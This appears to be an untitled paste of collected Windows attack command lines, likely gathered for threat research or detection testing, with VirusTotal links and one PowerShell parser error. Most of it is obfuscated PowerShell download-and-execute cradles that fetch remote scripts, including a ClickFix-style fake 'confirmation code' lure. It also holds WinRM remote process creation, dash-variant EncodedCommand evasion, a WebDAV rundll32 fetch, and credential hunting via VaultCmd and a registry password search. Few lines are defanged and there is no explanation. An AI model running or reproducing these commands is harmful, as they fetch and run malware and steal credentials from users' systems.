--- # System prepended metadata title: Untitled --- PS C:\WINDOWS\system32> wsl --install kali-linux Downloading: Kali Linux Rolling Installing: Kali Linux Rolling WSL2 is not supported with your current machine configuration. Please enable the "Virtual Machine Platform" optional component and ensure virtualisation is enabled in the BIOS. Enable "Virtual Machine Platform" by running: wsl.exe --install --no-distribution For information please visit https://aka.ms/enablevirtualization Error code: Wsl/InstallDistro/Service/RegisterDistro/CreateVm/HCS/HCS_E_HYPERV_NOT_INSTALLED LOCALCOMMAND https://easyupload.io/q457jy PROXYCOMMAND https://easyupload.io/nakmel C:\WINDOWS\system32\cmd.exe /c ""C:\WINDOWS\system32\winrm.cmd" invoke Create wmicimv2/Win32_Process @{CommandLine="cmd /c c:\windows\system32\calc.exe"} -r:http://target:5985" Process: c:\windows\system32\cmd.exe Command Line: "C:\WINDOWS\system32\cmd.exe" /c start /min powershell -e JABjAD0AJwBoAHQAJwArACcAdABwACcAOwAoAC4AJwBcAFcAKgBcACoAMwAyAFwAYwA/AD8AbAAuAGUAKgAnACAAIgAkAHsAYwB9AHMAOgAvAC8AZwBsAGMAZABuAC4AaQBuAGYAbwAvAGMAZABuAC8AcwAvADMANgAzADgAMwA2ADkANgAyADMAIgApAHwAaQBlAHgA https://www.virustotal.com/gui/file/ba5beb189d6e1811605b0a4986b232108d6193dcf09e5b2a603ea4448e6f263c/behavior "PowerShell.exe" -N"oP"r"OF"I /w h /"COM"ma "$s"r"t15 = 'c"m"b"k"z8b"ui0000"08k"2"2bcm3"b"3k[.]info'; $vls9"1"0 = In"v"o"ke"-"R"e"st"Met"h"od -Uri $srt15; Inv"oke-"Exp"ress"i"o"n $vls910" powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'google'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"\1 "PowerShell.exe" -nop -w h -ep bypass -Command (&('Start-BitsTransfer') ('https://google.com') ($env:TEMP+'y.ps1')); &($env:TEMP+'y.ps1');$__cfCheck="Confirmation code: 393"' https://www.virustotal.com/gui/file/082d5935271abf58419fb5e9de83996bd2f840152de595afa7d08e4b98b1d203/community Command Line: "PowerShell.exe" -c "$t='Ne';$y='t.WebCli';$u='ent';$i='Downl';$o='oadS';$p='tring';$a='https://alvinkahn.com/frodo.ps1';(New-Object ($t+$y+$u)).($i+$o+$p).Invoke($a)|iex "PowerShell.exe" -c "$t='Ne';$y='t.WebCli';$u='ent';$i='Downl';$o='oadS';$p='tring';$a='https://alvinkahn.com/frodo.ps1';(New-Object ($t+$y+$u)).($i+$o+$p).Invoke($a)|iex" PowerShell.exe -c "$t='Ne';$y='t.WebCli';$u='ent';$i='Downl';$o='oadS';$p='tring';$a='https://alvinkahn.com/frodo.ps1';iex ((New-Object ($t+$y+$u)).($i+$o+$p).Invoke($a))" At line:1 char:107 + ... ring';='https://alvinkahn.com/frodo.ps1';iex ((New-Object (++)).(++). ... + ~ Missing expression after unary operator '++'. At line:1 char:113 + ... ='https://alvinkahn.com/frodo.ps1';iex ((New-Object (++)).(++).Invoke ... + ~ Missing expression after unary operator '++'. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : MissingExpressionAfterOperator PowerShell.exe -c "$t='Ne';$y='t.WebCli';$u='ent';$i='Downl';$o='oadS';$p='tring';$a='https://alvinkahn.com/frodo.ps1';iex ((New-Object ($t+$y+$u)).($i+$o+$p).Invoke($a))" PowerShell.exe -Command "$t='Ne';$y='t.WebCli';$u='ent';$i='Downl';$o='oadS';$p='tring';$a='https://alvinkahn.com/frodo.ps1';iex ((New-Object ($t+$y+$u)).($i+$o+$p).Invoke($a))" "PowerShell.exe" -c "$t='Ne';$y='t.WebCli';$u='ent';$i='Downl';$o='oadS';$p='tring';$a='hxxps[://]alvinkahn.com/frodo.ps1';(New-Object ($t+$y+$u)).($i+$o+$p).Invoke($a)|iex" "PowerShell.exe" -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $t='Ne';$y='t.WebCli';$u='ent';$i='Downl';$o='oadS';$p='tring';$a='https://alvinkahn.com/frodo.ps1'; (New-Object ($t+$y+$u)).($i+$o+$p).Invoke($a) | iex" powershell.exe —EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBjAGEAbABjAC4AZQB4AGUAIgA= \x{2013} → EN DASH (–) powershell.exe –EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBjAGEAbABjAC4AZQB4AGUAIgA= \x{2014} → EM DASH (—) powershell.exe —EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBjAGEAbABjAC4AZQB4AGUAIgA= \x{2015} → HORIZONTAL BAR (―) powershell.exe ―EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBjAGEAbABjAC4AZQB4AGUAIgA= VaultCmd.exe /list from ps: reg.exe" query HKLM /f password /t REG_SZ /s rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie singing-organization-crops-total.trycloudflare.com@SSL https://singing-organization-crops-total.trycloudflare.com/subhtel/faush.wsf